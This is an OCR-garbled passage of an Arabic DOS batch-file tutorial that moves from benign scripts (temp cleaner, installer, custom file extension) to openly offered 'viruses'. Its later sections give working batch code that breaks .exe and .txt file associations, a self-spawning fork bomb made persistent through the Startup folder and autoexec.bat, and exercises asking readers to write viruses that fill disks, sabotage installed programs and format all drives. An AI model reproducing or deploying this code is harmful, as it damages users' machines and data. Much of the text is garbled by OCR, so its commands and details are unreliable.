0 ؛ ثم اضغط موافق و سيتم فتح المفكرة؛ الآن أنت جاهز لكتابة أول ملف دفعي. 


لنفرض أننا نريد أن نصنع برنامجاً يقوم بإفراغ مجلد 717317 و مجلد TEMPORARY INTERNET‏ 
FILES‏ 


إن العبارات البرمجية (الأوامر) التي نجدها في أغلب الملفات الدفعية هي: 
عرض المسارات 150110 
مقاطعة عمل الملف الدفعي 8۸٤۸)‏ 


و إذا أردنا أن نبدأ بكتابة الملف الدفعي» فيجب أن نقوم بضبط هاتين الخاصتين في بداية الملف الدفعي» لذلك 
ECHO OFF‏ 


BREAK OFF 
فالسطر الأول سيقوم بمنع عرض المسارات أثناء عمل الملف الدفعي» أما الثاني» فسيمنع مقاطعة الملف‎ 


الدفعي من قبل المستخدم» فالمستخدم يمكن أن يقاطع الملف الدفعي بأن يضغط زري © +01©: والأمر السابق 
من شأنه أن يمنع هذه المقاطعة. 


ثم سنكتب السطر التالي: 
ECHO This program will delete all files in temp folder and temporary internet files‏ 
folder.‏ 
ماذا يعني الأمر السابق؟ أو ما هي وظيفته؟ (راجع الأمر 50170). 
ثم السطر التالي: 
PAUSE‏ 


ما هي وظيفة هذا الأمر؟ (راجع الأمر .)۴٥۸ 0S٤‏ 
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الآن..٠‏ للوصول إلى المجلدين السابقين (اللذان نريد إفراغهما) يمكن الوصول إليهما بصورة مباشرة» أو عن 
طريق متغيرات ويندوز؛ فمجلد 1113/7 يمكن استخدام المتغير 12/7 للوصول إليه» وأما بالنسبة لمجلد ملفات 
انقرفت امز قك فل اليهديدوياء الآن سكب الدسطوين: 


DEL /Q /S /F %TMP%\*.* 
DEL /Q /S /F C\DOCUME~1\SAMERB~1\LOCALS~1\TEMPOR~1\*.* 


أنا أعتقد أن لديك الأسئلة التالية: 


1- لماذا الإشارة %؟ 
2 لماذا الأشارة سه 
3- من أين جلبت المتغير؟ 


دعني أبدأ من السؤال التالث» المتغيرات (متغيرات ويندوز) يمكن استعراضها بواسطة الأمر 1٤S؟»‏ حيث 
سترى اسم المتغير و بجانبه القيمة التي يحملهاء لكن لاحظ هنا (بالنسبة للسؤال الأول) أننا عندما استدعينا المتغير 
وضعنا بجانب اسمه من الجهتين علامة %» فهكذا يتم استدعاء أي متغير من المتغيرات» %المتغير% ٠‏ وهكذا 
سيتم طلب القيمة التي يحملها لتحل مكان طلب استدعاءه» فمثلا إن أردنا أن نعرض رسالة على المستخدم» مكتوب 
فيها اسم مستخدم جهاز الكومبيوتر فسيكون الأمر كالتالي: 


ECHO %USERNAME% .. Hello In My Program 
وأثناء عمل البرنامج ستظهر نتيجة السطر السابق على الشكل:‎ 
SamerBakkar Hello In My Program 


هذا إن طبقت الأمر في جهازي ٠‏ وبالطبع سيختلف مجموعة من المتغيرات من جهاز لآخر و من نظام 
n‏ خب لآخر. 


نعود للسؤال الثاني» إن نظام (0S8‏ لا يتعامل مع الفراغات في أسماء المجلدات و الملفات» وإن كان يعرضها 
أحياناًء لكنه يعرضنا لمشاكل أثناء عمل البرامج التي تعتمد عليهء و لتفادي هذه الثغرة فإننا نقوم بالتالي: 


إذا كان هناك فراغ في اسم المجلد أو الملف فسيتم التوقف عنده ووضع الإشارة - ثم الرقم 1» والرقم 1 
نضعه إذا كان ترتيب الملف هجائيا بين الملفات الشبيهة الأسماء به هو الأول» مثلا: 


Sam Men 


Sam Rose 
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Sam Delta 


إذا أ ردنا الدخول إلى أحد المجلدات السابقة بواسطة الأمر C2‏ فلن ننجح بالطريقة المعتادة» أي صه؟ ٤5‏ 
Delta‏ 


فسنحصل على رسالة خطأء لذلك سنكتب: 5323-1 C5‏ هذا للدخول إلى المجلد1(1]8 58312 و سنكتب °5 
5812-2 لندخل إلى المجلد ۷6١‏ صه؟» لاحظ الكلمات التي تأتي بعد كلمة 5312 في كل اسمء و رتب هذه 
الكلمات هجائياء سيكون لديك الترتيب التالي: 


Sam Delta 
Sam Men 
Sam Rose 
لذلك فإن أسماءها في نظام دوس سنكون كالتالي بالترتيب من الأول إلى الأخير:‎ 
5211-1 
Sam~2 


Sam~3 


نعود الآن إلى برنامجنا..» بعد أن يحذف البرنامج كافة الملفات الموجودة في المجلدين المذكورين نريده أن 
يمسح الشاشة» ثم يعطينا رسالة تفيد بأن المسح قد انتهى» و لعمل ذلك نكتب السطرين 


CLS 
ECHO Cleaning Is Done.. 
PAUSE 
لماذا أضفنا السطر الأخير؟ أي 151آ24؟‎ 
بعد ذلك نريد إنهاء البرنامج» لذلك سنكتب الأمر:‎ 
EXIT 
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الآن انتهينا من كتابة الكودء لكن كيف نحول هذا الكود إلى ملف دفعي؟ 
اضغط ملف» اختر حفظ باسم» ضع أي اسم تحبه و ضع في نهايته (]53.) نقطة(.) وكلمة( 63+6)» ثم اضغط 


الآن اذهب إلى الملف الذي قمت بحفظه سترى أن له أيقونة بيضاء في وسطها دائرة صفراء لها مسننات» هذا 
هو ملفك الدفعي. 


إن برنامجك الذي أنجزته للتو قابل للتطوير و التعديل» لعرض الكود أو لتعديله (كود ملفك الدفعي) ضع مؤشر 
الفأرة على الملف الدفعي» اضغط زر يمين و اختر تحريرء سيظهر النص (الكود) الذي كتبته أمامك؛» عدل ما 
تريد ثم اختر قائمة ملف ثم حفظهء الآن تم حفظ التعديلات على ملفك الدفعي. 


قد يتساءل القارئ.. » ألن يستطيع أي شخص أن يأخذ الكود الذي أكتبه؟ 


سأجيبه أنا بنعم» وذلك بضغط الزر اليميني للفأرة فوق الملف الدفعي ثم اختيار "تحرير". لكن ما رأيك بأن 
تحول برنامجك الذي صنعته قبل قليل إلى صيغة 6<ه. بحيث تحمي الكود أولاء و تجعل برنامجك يظهر بمظهر 
آخر (احترافي)» سيقول لي القارئ "ايدي بزنارك" بس كيف؟» سأجيبه: 


هناك برنامج مرفق مع هذا الكتاب» اسمه 82۴0٣۷٥۲٤٥۲‏ يقوم بتحويل البرنامج من صيغة 536. إلى 
صيغة ©<©.» طريقة استخدامه واضحة؛ لكن يجب عليك الالتزام بالتعليمات المرفقة مع البرنامج حتى يعمل 
ركام يشقل دد 
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٠‏ البرنامج الثاني باستخدام الملفات الدفعية ۴1٥‏ 1ع)159: 
وهو برنامج تنصيبء أي مثل برنامج المنغ56 أو ال1054811 الذي يقوم بتنصيب البرامج. 
افتح مستند جديد على المفكرة و لنبدأ العمل.. 
ما هما أول سطرين ؟ وماذا يعملان؟ (راجع المثال التطبيقي السابق). 


بعد أن عطلنا عرض المسارات بوضع الأمر 0۴۴ 80110 و منعنا مقاطعة الملف أثناء عمله بواسطة الأمر 
BREAK OFF‏ سنجعل عنوان النافذة يحمل كلمة 1056811 » ثم سنضع رسالة مفادها أن هذا البرنامج هو عبارة 


عن برنامج إعداد لبرنامج 16م5310 على سبيل المثال» معنى كلامي السابق أن الأسطر الثلاث الأولى ستصبح 
كالتالي: 


ECHO OFF 
BREAK OFF 
TITLE Install 


ECHO. This Program Will Install Sample Program On Your Machine 


لاحظ أننا وضعنا .80110 و النقطة تفيد (إن وضعت بعد الأمر 80110) بأنها ستترك مسافة واحدة في 
بداية السطر قبل عرض التعليق. 


و لكن قبل أن نضع الاختيار يجب أن نضع السطرين: 
ECHO. To Continue Press 1‏ 


ECHO. To Quit Priss 2‏ 
من المؤكد أنك تعرف معنى السطرين السابقين. 


الآن نضع الاختيار كالتالي: 
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الآن شرح كود الاختيار: 


CHOICE 2 

IF ERRORLEVEL 2 GOTO :CO 

IF ERRORLEVEL 1 GOTO :EX 

:CO 

MKDIR %ProgramFiles%o\Sample 

COPY *.* %ProgramFilesYo\Sample\ /Y 

COPY App.exe %USERPROFILE%\Desktop\ 

CLS 

ECHO. Installation Completed.. Press any key to quit 
PAUSE 


EXIT 


:EX 


EXIT 


CHOICE /c:12 


وهو الأمر الذي يقوم بعرض الاختيار على المستخدم» 12 هي الاختيارات المتاحة للمستخدم. 


IF ERRORLEVEL 1 GOTO :CO 


أي إذا ضغط المستخدم زر 1 (رقم 1)» فاذهب إلى النقطة 00: 


IF ERRORLEVEL 2 GOTO :EX 


إذا ضغط المستخدم رقم 2 فاذهب إلى النقطة :٤×‏ 
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:CO 


النقطة التى سوف يذهب ليها البرنامج إذا اختار المستخدم رقم 1ء وما جود داخلها بأتى في ١‏ 
هي : 1 مج ر م رقم 1ء وما هو موجوا يادي في 
التالي بعدهاء وهو: 


MKDIR %ProgramFiles%o\Sample 


MKDR‏ كما تعلمنا هو أمر لصنع مجلدء وما هو بعده هو مسار المجلد الذي سيتم صنعهء 
11160 هو متغير من متغيرات ويندوزء يشير إلى المسار الذي تنزل فيه البرامج بشكل افتراضي» 
أجل.. كان من الممكن أن نضع بدل هذا المتغير السطر التالي: 


C:\Progra~1 


لن ماذا لر كان المتكهم ف غير السار الذي ميم فزي افر امج فيه يشكل افتراضي» قان كان فد فمل خلكء 
سيدو الضعق واضحا في برنامجناء وسنرغم المستخدم على شىء لا يكب لثلك: قمنا باستخدام. المتكين 
Program Files %‏ أما 16مدة9١‏ فهو المجلد الذي نريد صناعته. 


السطر التالي ضمن النقطة 00): هو: 
COPY *.* %ProgramFilesYo\Sample\ /Y‏ 


وسيقوم هذا السطر بنسخ كافة الملفات الموجودة ضمن المجلد الذي يوجد فيه الملف الدفعي إلى المجلد الذي 
صنعناه قبل قليل. 


COPY App.exe %USERPROFILE%\Desktop\ 


يقوم بوضع اختصار للبرنامج على سطح المكتب» لاحظ أن ع×ع.م م۸ هو البرنامج التطبيقي. 


CLS 


ECHO. Installation Completed.. Press any key to quit 
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يقوم بعرض رسالة على المستخدم» "إن الإعداد قد انتهى» اضغط أي زر للإغلاق". 
PAUSE‏ 
لعرض الرسالة "اضغط أي زر للمتابعة". 
EXIT‏ 
لإغلاق النافذة. 


إن الكلام السابق كله يحدث إذا ضغط المستخدم على زر 1ء أما إذا ضغط 2 فسيذهب البرنامج إلى النقطة 
6: التي لا يوجد داخلها سوى أمر الإنهاء '5217. 


الآن حول الملف الذي كتبته إلى ملف دفعي و ضعه أينما شئت مع مجموعة ملفات» وشغله و انظر النتيجة» 


ولكت للأسف إن كان لديك ۴× 75971520015 فستضطر لعمل خطوة إضافية. 
هناك نوعين من نوافذ الدوس في وندوس اكس بي الأول هو €°M5‏ و الثاني (017/7/47171© 


و النوع الأول لا يتعامل مع الملفات الدفعية بشكل سليم» لذلك سنقوم بعمل ملف دفعي آخر و نكتب فيه السطر 
التالي: 


COMMAND | | 3+ 


حيث أن الإشارة | تشير إلى أننا نريد وضع أمرين أو أكثر في نفس السطرء و 105.538 هو اسم الملف الذي 


إن نافذة الدوس الافتراضية في 362 [N00۷8‏ هي من النوع CM‏ و هذا السطر سوف يقوم بتشغيل 
النوع الثاني أي (002/13141711 و يأمره بتشغيل الملف الدفعي الأول وبذلك سيعمل الملف على أحسن وجه. 


لكن هناك خبر سيء آخر فيما يتعلق بويندوس اکس بيء فهو لا يعرف الأمر 01101017 لذلك ستضطر 
لحثف خطوة الأختيار و البدء قور بنسخ الملفاك بعد عرض رسالة على المستخدم تخبره أنه سوف “يكم تسخ 


بعض الملفات. 


و إن كان لديك M٤‏ 178/15 أو 98 فالبرنامج الأول كافي بكل كفاءة لعمل التنصيب بشكل ممتاز. 
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٠‏ البرنامج الثالث باستخدام الملفات الدفعية ۴1٥‏ طع)152: 


البرنامج الذي سأشرح كيفية صنعه الآن» برنامج خدمي جميلء لكنك يمكن أن تصنع بنفس هذه الطريقة» 
فيروس خطير يهدد أمن أنواع الملفات في النظامء هذا إن فهمت طريقة صنع البرنامج» وهذا هو هدفي من كتابة 


البرنامج الذي أنا بصدده الآن يقوم بصنع لاحقة جديدة» مثل م×ع. » أي سنصنع لاحقة برامج تنفيذية في 
الجهازء سأعيد صياغة الفكرة بشكل أبسطء انظر إلى أي برنامج تشغله» ما هي لاحقة الملف الذي تشغل منه هذا 
البرنامج؟ء هناك عدة لواحق تشير إلى الملفات التنفيذية (أي عند تشغيلها سيتم تنفيذ برنامج ما)ء أهم هذه اللواحق 
هي ©*©. و 12م. و 636. » إن السابقة هي أهم لواحق الملفات التنفيذية» لكن ما رأيك بأن تصنع لاحقة خاصة 
ببرنامجك؟» أي يمكنك أن تصنع برنامجك بأي لغة برمجة كانت» ثم تصنع ملف دفعي يقوم بتعريف لاحقة خاصة 
للملفات التطبيقية أو التنفيذية سيعمل عليها برنامجك» أظن أن الفكرة جميلة نسبياًء دعنا الآن من الكلام و لنبدأ 


إن هدف الفقرة ليس بهذه البساطةء إنما أريدك أن تتقن التعامل مع أنواع الملفات. 


أعد ذاكرتك إلى الخلف قليلا أي إلى قسم أوامر دوس» هل تتذكر أمرأً يعرض أنواع الملفات الموجودة في 
الجهاز؟ 


أجل..» لقد أصبت» إنه الأمر 855060 » الذي يعرض كافة أنواع الملفات الموجودة في الجهازء و يعرض 
برامج تشغيلهاء كما يتيح لك التعديل عليهاء و إضافة أنواع جديدة عليها. 


الآن أريدك من خلال الأمر 455060 أن تحزر ما هو برنامج تشغيل الملفات ذات اللاحقة ©5©.» إن أردت 
المساعدة فسيكون الأمر الذي يحضر لك ضالتك كالتالي: 


ASSOC .exe 
اهي دة الأثر؟ وسا هر الشكل؟‎ 
ستكون نتيجة الأمر كالتالي:‎ 

.exe=exefile 
.©:2©1116 لاحظ من السطر السابق» أن نوع الملفات ع×ع. يتم تشغيله بواسطة المشغل الذي يدعى‎ 


انتهت الخطوة الأولىء فهيا بنا للثانية.. 
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الآن نريد أن نعرف المسار الذي يعمل منه المشغل» بغض النظر إن كان المغل اسمه 661116 أو غيره لأن 
المشغل سوف يختلف من نوع ملفات إلى آخرء فلمعرفة مسار المشغل نفعل ذلك بواسطة الأمر ۴۲۲۷۶۴٤۴‏ (كما 
ذكرنا سابقاً)» و يكون الأمر كالتالي: 


FTYPE exefile 
و ستكون النتيجة كالتالي:‎ 
exefile="%1" %* 


ستقول لي أين المسارء أليس كذلك؟. في الحقيقة» الملفات التنفيذية ليس لها مشغل خاصء لأن النظام بأكمله هو 
مشغلهاء وسيتم تعريف مسار برنامج تشغيلها على أنه *% "901" لكنك إن أردت عرض برنامج تشغيل الملفات 
ذات اللاحقة صصص. سيكون الأمر كالتالي: 


ASSOC .mmm 

و النتيجة ستكون: 
.mmm=MPlayer‏ 
الآن عرفنا أن برنامج تشغيل الملفات ذات اللاحقة صصص. هو إءره[1۴ء ولعرض مساره نستخدم الأمر : 
FTYPE MPlayer‏ 

و ستكون النتيجة: 
MPlayer=mplay32.exe /play /close "YL"‏ 


و الآن عدت لتقول لي أين مسار البرنامج» و سأقول لك عد إلى الأمر ۴۸18 » وراجعه»ء ستجد أن ويندوز 
سيبحث في فهارس معينة عند بدء أي برنامج بهدف الحصول على ملفات دعم» افتح الدوس و نفذ الأمر 7.4111 
> لاحظ أن النتيجة ستكون كالتالي: 


PATH=C:\WINDO WS\system32;C:\WINDOWS;C:\WINDO WS\system32\WBEM;C 
:\Program Files\Support Tools\ 


إن هذه النتيجة تعني أنه سوف يتم البحث عن ملفات الدعم في الفهارس: 


1- C:\WINDOWS\system32 
2- C:\WINDOWS 
3- C:\WINDOWS\system32\WBEM 
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4- C:\Program Files\Support 10015١ 


الآن لنعد إلى مشغل الملفات «تدصمم. الذي يدعى 2/12133:61» رأينا أن مشغله الفعلي هو عنزه.133/32م50» أريدك 
أن تبحث في الفهارس التي وجدناها بواسطة الأمر 28111 فإن لم تجد ملفاً يدعى 22019332.626 فلن أضع 
أصابعي على لوحة مفاتيح طوال حياتي هههههء سأوضح الكلام بشكل أكبر» إن أمر عرض المسارات ۴۲۷۶۴ 
لم يخطئ» فبدلا من أن يعطينا النتيجة كالتالي: 


MPlayer= ععدء.1323:32 مط 2 بطع 171711101175153:5ن)‎ /play /close "%L" 
أعطاها كالتالي:‎ 
MPlayer=mplay32.exe /play /close "90[1" 


وليس هناك فرق بين النتيجتين» لأن وندوس بكل الأحوال سيبحث في المجلد 53151650132 عن ملفات الدعم؛ هل 


أصبحت الفكرة واضحة؟ 


و كمثال آخر عن المشغالات (برامج انث لتشغبا ( و المسارات» دعونا نعرف مسار برنامج الث لتشغيل الذي يد بشغل 
الملفات من النوع (اللاحقة) 0014.» أي نفس نوع الملف الذي تقرؤه الآن» أتوقع أنك فتحت الدوس» وأجريت الأمر 
التالي: 


ASSOC .pdf 
لقد حصلت على النتيجة التالية:‎ 
.pdflAcroExch.Document 


و هذا يعني أن البرنامج الذي يشغل الملفات ذات اللاحقة 01م. يدعى †AcroExch.Documeء‏ الآن دعنا نرى 
مسار هذا المشغل» سيكون ذلك بالأمر : 


FTYPE AcroExch.Document 
و ستكون النتيجة كالتالي:‎ 
AcroExch.Document="C:\Progra~1\Adobe\Acroba~1\Reader\AcroRd32.exe" "%1" 


لاحظ معيء لقد اختلفت النتيجة» فقد تم الإعلان عن موقع المشغل بشكل صريح وواضح» فالمشغل يقع على 
السواقة ٣:‏ في المجلد 11165 4۳إعهPr«‏ ثم المجلد Adobe‏ ثم 6.0 Acrobat‏ ثم المجلد ۲٥له۸R»‏ وأخير 1 
المشغل الفعلي لهذا النوع من الملفات وهو الملف ٥×م.۲0۸432٥۸.‏ 
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الآن أعتقد أنك أصبحت تجيد - إلى حد ما - التعامل مع أنواع الملفات و المشغلات. 


أذكر أن كان هدفنا من كل هذا الكلام حول أنواع الملفات و مشغلاتها هو تعريف لاحقة تعمل عمل لواحق البرامج 
التنفيذية.. أليس كذلك؟ 
إن كل هذا البرنامج يتلخص في عدة أسطر هي: 
ECHO OFF‏ 
ASSOC .saz=MyAppendage‏ 
FTYPE MyAppendage=”%%1” %%o*‏ 
CLS‏ 


EXIT 


هذه هي كل المعضلةء لكن لحظة..» أذكر أني ذكرت أن هناك مشكلة في تعامل ۴× د۷1 مع بعض الأوامرء 
وللأسف..» فالأوامر السابقة مضمنة في الأوامر التي لا يتعامل معها C۷2‏ لذلك سنضطر لتشغيلها عن طريق 
نافذة ال »)C0MMNAND‏ لكن هل تذكر كيف؟ 


سأذكرك كيف سيتم ذلك بمثال آخرء وسنعمل حركة أخرى تضيف بعض الجمالية للبرنامج. 


لنفرض أننا صنعنا الملف الدفعي السابق» الذي أسميته أنت 620286.684مم217:4: حتى لو لم تسميه بهذا الاس 
أريدك أن تغير لاحقته إلى أي لاحقة أخرىء لنقم بتسميته الاسم 6520886.011مم3813:8,: أعلم أن اللاحقة 011. هي 
لاحقة ملفات مكتبات الربط الديناميكي: لكن صبراً علي» فسنقوم بعمل حركة بسيطة و جميلة. 


افتح مستند جديد على المفكرة و اكتب داخله التالي: 
ECHO OFF‏ 


COPY MyAppendage.dll c:\ MyAppendage. bat 
برأيك ماذا سيحدث عندما يتم تنفيذ السطر السابق؟‎ 


صح..» سيتم نسخ الملف 6201386.111م2438 إلى السواقة 0:١‏ و إعادة تسمية النسخة الجديدة إلى 
.MyAppendage. bat‏ 


الآن لنكمل كتابة الملف الدفعي» سنضع بعد السطرين السابقين الأسطر التالية: 


Created By Samer Bakkar ^HaCkEr_ BoY^ 55 


كتاب دوس .. وصولا لبرمجة الملفات الدفعية ^HaCkEr_ BoY^‏ 


COMMAND | CALL C:\ MyAppendage.bat 


انتهينا الآن من كتابة البرنامج» اصنع الملف الدفعي الأخير بصورة طبيعية» و ضعه مع ملف ال 011 المزيف» 
وسيتم العمل على أحسن ما يرام. 


أريد أن أنوه لشئ» إذا أردنا تعريف نوع ملفات يدوياً فإن ذلك مختلف بشئ بسيط عن تعريف نوع بواسطة ملف 
دفعي ذاتي التنفيذء فإن أردنا تعريف نوع يدوياً يكون العمل كالتالي: 


1 - نفتح نافذة دوس (ابدأ - تشغيل - (COMMAND‏ 
2- نكتب الأمر ASSOC .saz= MyAppendage‏ 
3- ثم نكتب الأمر *% FTYPE MyAppendage=”%1”‏ 


و نكون قد انتهينا من العمل» الآن إذا أعدنا تسمية أي ملف لاحقته م×ء. إلى اللاحقة 532. فسيعمل الملف بشكل 
سليم على أنه ملف تنفيذي. 


لكن ما الفرق بين الطريقتين؟ 


إذا كنت قوي الملاحظة لدرجة كافية ستقول لي أننا في الطريقة الأولى (أي ملف دفعي) كتبنا إشارتي 90» ولكن 
في الطريقة الثانية كتبنا إشارة واحدة. 


إن ويندوز أثناء تعامله مع المتغيرات و الملفات الدفعية يفرق بين %1 وبين %%1) ففي الملف الدفعي سيتم 
إلغاء إشارة % واحدة ووضع ما يأتي بعدها في ذخيرة الأمر ©45506, لكن إن فعلنا ذلك يدوياء فسيتم إدخال 
كافة الأحرف و الرموز في القائمة. 
الآن قد انتهينا من صنع برنامجنا.. 


في الجزء التالي سأقوم بكتابة وشرح بعض الفيروسات» والجميل في هذه الفيروسات أنها غير معروفة من قبل 


الأنتي فايروس 81571405 لذلك أريدك أن تركز معي جيداًء لكي يتحقق هدفي من كتابتها.. 
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الفيروس الأول باستخدام الملفات الدفعية: 
قبل البدء بهذا الموضوع - أقصد الفيروسات - أعلن إخلاء مسؤوليتي عن أي استخدام لهذه الفيروسات أو طرق 


إن الفيروس الأول الذي سنقوم بصناعته يتصل بشكل مباشر بأنواع الملفات» لأن هذا الفايرس سيقوم بتعطيل كافة 
أنواع الملفات التي نريد تعطيلهاء أرجو الحذر عند العملء لأنك إن لم تستطع إصلاح ما خربت» فستضطر لإعادة 
تنصيب النظام. 


لنبدأ بصناعة الفيروس.. 
افتح المفكرة» واكتب داخلها: 
@ECHO OFF‏ 


FTYPE exefile=%%* 


EXIT 


انتهينا من صناعة الفايرس» فإذا صنعت من الكود السابق ملف دفعي وشغلته» وعدت لتشغل أي ملف 11308 
فسيعطيك ويندوز رسالة تشير إلى موقع خاطئ للملف. 
إن كنت قد تورطت وعملت ذلك» فلإصلاح العطل اصنع ملف دفعي جديد وضع داخله الأسطر التالية: 
@ECHO OFF‏ 
FTYPE exefile=”%%1” %%o*‏ 


EXIT 
و شغله» ستجد أنه تم إصلاح الخطأ.‎ 


إذا فهمت الفكرة من الأمر السابق (أقصد أمر التعطيل)» فستصنع فيروساً يدمر كافة اللواحق التي تعطيها له» وإن 


في الكود السابق قمنا بتعطيل كافة الملفات التي لاحقتها ©6:©؛ تعال لنضف سطراً آخر يقوم بتعطيل لاحقة أخرى. 


@ECHO OFF 
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FTYPE exefile=%%* 

FTYPE txtfile=%%* 

EXIT 

لاحظ أننا أضفنا سطراً يقوم بتعطيل الملفات ذات اللاحقة ».)»٤‏ فنحن نضع الأمر 5150518 ثم اسم مشغل 
الملفات» ثم إشارة = ثم *%%) وللحصول على اسم مشغل أي نوع من الملفات نكتب الأمر: 

ASSOC .txt 


بالأمر السابق سنحصل على مشغل الملفات ذات اللاحقة »].ء والنتيجة هي عااfا×ا=ا»).»‏ أي أن المشغل هو 
16 وللحصول على اسم مشغل أي نوع آخر نبدل 656. بالنوع الذي نريد» وسنحصل على النتيجة. 


وهكذا نكون قد عطلنا نوع الملفات؛ في الحقيقة نحن في عملنا هذا إنما نقوم بتضليل نوع الملفات عن برنامج 
التشغيل» ولا نقوم بأي شئ آخر. 


حاول وضع أكبر عدد من أنواع الملفات في ملفك الدفعي وستكون النتيجة أخطرء لأنك ستقوم بتعطيل عدد أكبر 
من الأنواع» وحاول انتقاء أنواع مهمة مثل ©©. و 0012©. و ©40. و 04م. و .Zip‏ و 584. و إلى آخره من 
الأنواع المهمة. 


أفترض أنك قد تساءلت عن الرمز © الذي وضعته قبل 0۴۴ 800110: وسأقول لك ما فائدته» هو رمز يستخدم 
في الملفات الدفعيةء ويفيد في تنفيذ الأمر الذي بعده دون كتابته على الشاشة» فلو صنعت ملف دفعي فيه الأمر 
1R‏ عند تنفيذ (تشغيل) الملف سيقوم الملف بطباعة الأمر 1۸( على الشاشة» ثم يظهر نتيجته» أما إذا وضعت 
الرمز © قبله» أي هكذا »@51R‏ فسيقوم الملف الدفعي بعرض النتيجة دون طباعة الأمرء أي يبدأ مباشرة 
بإظهار النتيجة. 


ونحن إن وضعنا الرمز © قبل الأمر 0۴۴ 80110 فإن النتيجة هي تعميم الأمر على الملف الدفعي بشكل كلي» 
وبالتالي إخفاء الأوامر كلها والبدء مباشرة بعرض نتائج الأوامر الموجودة داخل الملف الدفعي دون طباعتها. 
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الفيروس الثاني باستخدام الملفات الدفعية: 


إن قصدي من كتابة أي كود -برنامج أو فيروس- هو أن تتعلم طريقة كتابة الكودء أقصد أنك بإمكانك أن تكتب 
أكثر من 100 فيروس مختلف بمجرد معرفتك حول كيفية التعامل مع أوامر دوس و كيفية وضعها داخل الملف 
الدفعي» ولكني سأبقى معك حتى تفهم كيفية كتابة تلك الأوامر بشكل سليم. 


هناك الكثير من الفيروسات التي يمكن صناعتهاء وأنا حائر أيها أختارء لكني في هذا الفايرس سأتطرق إلى أمر لم 
يرد سابقاء تابع معي كيفية صناعة الفايرس الذي يقوم بإغراق الذاكرة. 


مهمة هذا الفايرس هو تشغيل عدد لا نهائي من نوافذ الدوس حتى تمتلئ الذاكرة» فيضطر المستخدم لإعادة تشغيل 
الجهاز. 


إن هذا الفايرس لا يتعدى السطر الواحد وهو: 

1 5141 
لكن شرح هذا السطر ربما يطول.. 
لقد تعلمنا ما هي وظيفة الأمر "518121 لذلك لن نعيد شرحه. 


أما الرمز % فهي تشير إلى أن الذي سيأتي بعدها إما متغيرء أو اسم الملف الدفعي» عندما يعمل الكود السابق 
وعندما يرى دوس الرمز % فإنه سيتوقع أن المستخدم يريد استخدام متغير (أي مثل المتغيرات التي نحضرها من 
الأمر 581 أو نعرفها بواسطته)» ولكنه عندما يرى أن الكلمة لا تنتهي بالرمز % فلن يبقى أمامه سوى خيار 
واحدء وهو أن اسم الملف الدفعي الذي يعمل هو ما بعد الرمز 9 وسيقوم بتنفيذ أمر ما بعدد لا نهائي و بناءً 
على ذلك فإن الكود السابق لن يعمل إلا إذا كان اسم الملف الدفعي هو batchfilename. bat‏ . 


إذاً..» إذا كان اسم الملف الدفعي 717777.636 فكيف سيكون السطر السابق؟.. صح» سيكون كالتالي: 
START %WW.bat‏ 


والآن» لنأت لتفرعات الكود؛ إذا كان المستخدم الذي سيعمل الفايرس في جهازه لديه معرفة سطحية في دوس أو 
في الملفات الدفعية» سيضغط مباشرة و بدون أي تفكير على الزرين 0-آ112©.: فماذا علينا أن نفعل لمنعه؟ 


وإن كان المستخدم لا يعرف كيف يوقف عمل الملف الدفعي» أو أن الخطة قد نجحتء فسيعيد إقلاع الجهازء لكن 
ركز معيء إنه سيعيد إقلاع الجهازء ومن طبيعة عمل الفيروسات أنها تقوم بأعمال مزعجة أو مؤذية» إن كنت قد 
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بشكل عام» إن البرامج التي تعمل عند بداية الإقلاع يمكن أن تتواجد في عدة أماكن أهمها: 


2- بدء التشغيل (الموجود في قائمة ابدأ). 
3- الملف الخطير والملف الدفعي الأول وهو 1106:260.034الل. 


إن التعامل مع الرجستري بواسطة الملفات الدفعية ممکن» لكنه يحتاج إلى موافقة المستخدم على خطوة ماء ومن 
طبيعة الفايرس أن يعمل دون أن يستشير أحداء لذلك سنستبعد الخيار الأول» و سنلجأ للخيار الثاني» ولكن كيف 
إن كنت قد فهمت الأمر '5181 فستفعل ذلك ببساطة» لكني سأكتب الأمر» وهو: 
COPY batchfilename.bat YUSERPROFILE% \Start~1\Programs\Startup\‏ 
و بذلك نكون قد وضعنا الملف 53]014116231026.5834 في قائمة ابدأء ضمن مجلد بدء التشغيل. 
و للضمان» سندخل أمر في ملف 4110660.036/ يقوم بتشغيل الفايرس عند بدء تشغيل ويندوزء وذلك باستخدام 
الطريقة << كالتالي: 
COPY batchfilename.bat 7710119‏ 
ECHO >>%SystemDrive%o\autoexec.bat‏ 


ECHO CALL %windir%o\batchfilename. bat >=>YoSystemDrive%o\autoexec. bat 


و بهذا الشكل نكون قد أضفنا الفايرس إلى قائمة بدء التشغيل و ملف هط.٥e×عautu‏ 


وفي نهاية العمل (وبعد وضع بعض الكماليات)ء سيصبح الكود النهائي للفايرس كالتالي: 
@ECHO OFF‏ 

BREAK OFF 

ECHO HeLlO I aM ^HaCkEr BoY^ hOw aRe yOu?.. HoW 15 yOuR CoMpUtEr? 
START %batchfilename.bat 

COPY batchfilename.bat YUSERPROFILE% \Start~1\Programs\Startup\ 


COPY batchfilename.bat %owindir%o\ 
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ECHO >>%SystemDrive%o\autoexec.bat 


ECHO CALL %windir%o\batchfilename. bat >>YoSystemDrive%o\autoexec.bat 


حاول أن تقراً الكود سطرا سطراء وستفهمه بالتأكيد. 
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١/‏ تمارين: 


اصنع فايرس يقوم بنسخ نفسه بعدد لا نهائي حتى يمتلئ الهارد. (نفس مبدأ آخر فايرس) 

اصنع ملفاً يقوم بتغيير الفهرس الافتراضي لتنصيب البرامج على النظام. (الأمر 587) 

اصنع ملفاً يقوم بإفراغ مجلد الملفات المؤقتة (1713/12). (الأمر 587) 

اصنع ملفا يقوم بتخريب كافة البرامج المثبتة على النظام. (لأمر ۲۸1۲) 

اصنع فيروساً يقوم بالعمل مرة واحدة؛ ثم يدخل في سبات لمدة أسبوع. (لامر كه) 

انشع قيروسا يقوم بتخريب النظام دون حذف كافة الملفات. (حذف إحدى الملفات الخطيرة أو تضليل النظام) 


ل ڄ هن لح صن الخ ل 


اصنع فيروساً يقوم بفرمتتة كافة السواقات المحتمل وجودها في الجهاز. (الأمر 5080/47) 
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اسم الملف: 
الدليل: 
القالب: 


010 دوس والملفات الدفعية.‎ 
E:\Learning\Bat Files\Doc's 
C:\Documents and Settings\SamerBakkar\Application 


Data\Microsoft\Templates\Normal.dot 


العنوان: 

الموضوع: 

الكاتب: 

تعليقات: 

تاريخ الإنشاء: 

رقم التغيير: 

الحفظ الأخير بتاريخ: 
الحفظ الأخير بقلم: 


زمن التحرير الإجمالي: 


الطباعة الأخيرة: 

منذ آخر طباعة كاملة 
عدد الصفحات: 
عدد الكلمات: 
